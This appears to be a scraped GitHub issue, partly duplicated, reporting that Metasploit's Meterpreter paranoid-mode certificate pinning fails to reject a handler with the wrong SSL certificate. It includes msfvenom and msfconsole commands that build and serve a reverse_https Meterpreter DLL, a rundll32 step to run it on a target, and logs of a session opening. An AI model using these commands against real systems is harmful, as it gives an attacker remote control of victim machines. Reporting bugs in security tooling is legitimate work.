You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
.msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=4445 PayloadUUIDTracking=true HandlerSSLCert=./samples/sample.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedDLL --arch x86 --platform windows -f dll -o sample.dll
msfconsole
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 4445
set ExitOnSession false
set SessionExpirationTimeout 0
set SessionCommunicationTimeout 0
set StagerVerifySSLCert true
set HandlerSSLCert ./samples/fake_sample.pem
run -j
Start cmd on target system and execute "rundll32.exe sample.dll, 0"
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
Were you following a specific guide/tutorial or reading documentation?
What should happen?
Meterpreter payload should have refused the connection
Current behavior
What happens instead?
[] https://0.0.0.0:4445 handling request from 192.168.178.39; (UUID: qfhfi8pp) Meterpreter will verify SSL Certificate with SHA1 hash e825b2fda47a5c15ecb892f2dbf85c92ad8e40ad
[] https://0.0.0.0:4445 handling request from 192.168.178.39; (UUID: qfhfi8pp) Staging x86 payload (177244 bytes) ...
[] Session ID 3 (192.168.178.46:4445 -> 192.168.178.39:56437) processing AutoRunScript './samples/sample.rb'
[] Meterpreter session 3 opened (192.168.178.46:4445 -> 192.168.178.39:56437) at 2024-12-07 18:11:25 +0100
Metasploit version
Get this with the version command in msfconsole (or git log -1 --pretty=oneline for a source install).
Framework: 6.4.22-dev-5e11dee
Console : 6.4.22-dev-5e11dee
Additional Information
If your version is less than 5.0.96, please update to the latest version and ensure your issue is still present.
If the issue is encountered within msfconsole, please run the debug command using the instructions below. If the issue is encountered outisde msfconsole, or the issue causes msfconsole to crash on startup, please delete this section.
Start msfconsole
Run the command set loglevel 3
Take the steps necessary recreate your issue
Run the debug command
Copy all the output below the ===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<=== line and make sure to REMOVE ANY SENSITIVE INFORMATION.
Replace these instructions and the paragraph above with the output from step 5.
The text was updated successfully, but these errors were encountered:
Steps to reproduce
How'd you do it?
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 4445
set ExitOnSession false
set SessionExpirationTimeout 0
set SessionCommunicationTimeout 0
set StagerVerifySSLCert true
set HandlerSSLCert ./samples/fake_sample.pem
run -j
This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.
Were you following a specific guide/tutorial or reading documentation?
If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-paranoid-mode.html
Expected behavior
What should happen?
Meterpreter payload should have refused the connection
Current behavior
What happens instead?
[] https://0.0.0.0:4445 handling request from 192.168.178.39; (UUID: qfhfi8pp) Meterpreter will verify SSL Certificate with SHA1 hash e825b2fda47a5c15ecb892f2dbf85c92ad8e40ad
[] https://0.0.0.0:4445 handling request from 192.168.178.39; (UUID: qfhfi8pp) Staging x86 payload (177244 bytes) ...
[] Session ID 3 (192.168.178.46:4445 -> 192.168.178.39:56437) processing AutoRunScript './samples/sample.rb'
[] Meterpreter session 3 opened (192.168.178.46:4445 -> 192.168.178.39:56437) at 2024-12-07 18:11:25 +0100
Metasploit version
Get this with the
version
command in msfconsole (orgit log -1 --pretty=oneline
for a source install).Framework: 6.4.22-dev-5e11dee
Console : 6.4.22-dev-5e11dee
Additional Information
If your version is less than
5.0.96
, please update to the latest version and ensure your issue is still present.If the issue is encountered within
msfconsole
, please run thedebug
command using the instructions below. If the issue is encountered outisdemsfconsole
, or the issue causesmsfconsole
to crash on startup, please delete this section.msfconsole
set loglevel 3
debug
command===8<=== CUT AND PASTE EVERYTHING BELOW THIS LINE ===8<===
line and make sure to REMOVE ANY SENSITIVE INFORMATION.The text was updated successfully, but these errors were encountered: